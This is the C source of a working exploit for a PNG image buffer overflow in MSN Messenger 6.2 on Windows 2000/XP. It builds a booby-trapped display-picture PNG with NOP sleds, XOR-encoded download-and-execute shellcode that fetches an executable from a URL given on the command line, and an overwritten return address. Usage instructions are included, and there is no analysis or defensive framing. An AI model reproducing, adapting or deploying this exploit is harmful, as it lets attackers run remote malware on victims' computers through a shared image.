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- /*
- *
- * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
- * Bug discoveried by Core Security Technologies (www.coresecurity.com)
- * Exploit coded By ATmaCA
- * Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
- * Web: http://www.atmacasoft.com
- * E-Mail: atmaca@icqmail.com
- * Credit to kozan and delikon
- * Usage:exploit <OutputPath> <Url>
- *
- */
- /*
- *
- * Tested with MSN Messenger 6.2.0137
- * This vulnerability can be exploited on Windows 2000 (all service packs)
- * and Windows XP (all service packs) that run vulnerable
- * clients of MSN Messenger.
- *
- */
- /*
- *
- * After creating vuln png image, open
- * MSN Messenger and select it as your display picture in
- * "Tools->Change Display Picture".
- *
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <conio.h>
- #include <string.h>
- #ifdef __BORLANDC__
- #include <mem.h>
- #endif
- #define NOP 0x90
- char png_header[] =
- "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
- "\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
- "\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
- char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
- /* Generic win32 http download shellcode
- xored with 0x1d by delikon (http://delikon.de/) */
- char shellcode[] = "\xEB"
- "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
- "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
- "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
- "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
- "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
- "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
- "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
- "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
- "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
- "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
- "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
- "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
- "\x78\x65\x78\x1D";
- FILE *di;
- int i = 0;
- short int weblength;
- char *web;
- char *pointer = NULL;
- char *newshellcode;
- /*xor cryptor*/
- char *Sifrele(char *Name1)
- {
- char *Name=Name1;
- char xor=0x1d;
- int Size=strlen(Name);
- for(i=0;i<Size;i++)
- Name[i]=Name[i]^xor;
- return Name;
- }
- void main(int argc, char *argv[])
- {
- if (argc < 3)
- {
- printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
- printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)\n");
- printf("Exploit coded By ATmaCA\n");
- printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
- printf("Web: http://www.atmacasoft.com\n");
- printf("E-Mail: atmaca@icqmail.com\n");
- printf("Credit to kozan and delikon\n\n");
- printf("\tUsage:exploit <OutputPath> <Url>\n");
- printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
- return;
- }
- web = argv[2];
- if( (di=fopen(argv[1],"wb")) == NULL )
- {
- printf("Error opening file!\n");
- return;
- }
- for(i=0;i<sizeof(png_header)-1;i++)
- fputc(png_header[i],di);
- /*stuff in a couple of NOPs*/
- for(i=0;i<99;i++)
- fputc(NOP,di);
- weblength=(short int)0xff22;
- pointer=strstr(shellcode,"\x22\xff");
- weblength-=strlen(web)+1;
- memcpy(pointer,&weblength,2);
- newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
- strcpy(newshellcode,shellcode);
- strcat(newshellcode,Sifrele(web));
- strcat(newshellcode,"\x1d");
- //shell code
- for(i=0;i<strlen(newshellcode);i++)
- fputc(newshellcode[i],di);
- for(i=0;i<(83-strlen(web));i++) //NOPs
- fputc(NOP,di);
- /*Overwriting the return address (EIP)*/
- /*0x005E0547 - ret */
- fputc(0x47,di);
- fputc(0x05,di);
- fputc(0x5e,di);
- fputc(0x00,di);
- for(i=0;i<sizeof(pngeof)-1;i++)
- fputc(pngeof[i],di);
- printf("Vulnarable png file %s has been generated!\n",argv[1]);
- fclose(di);
- }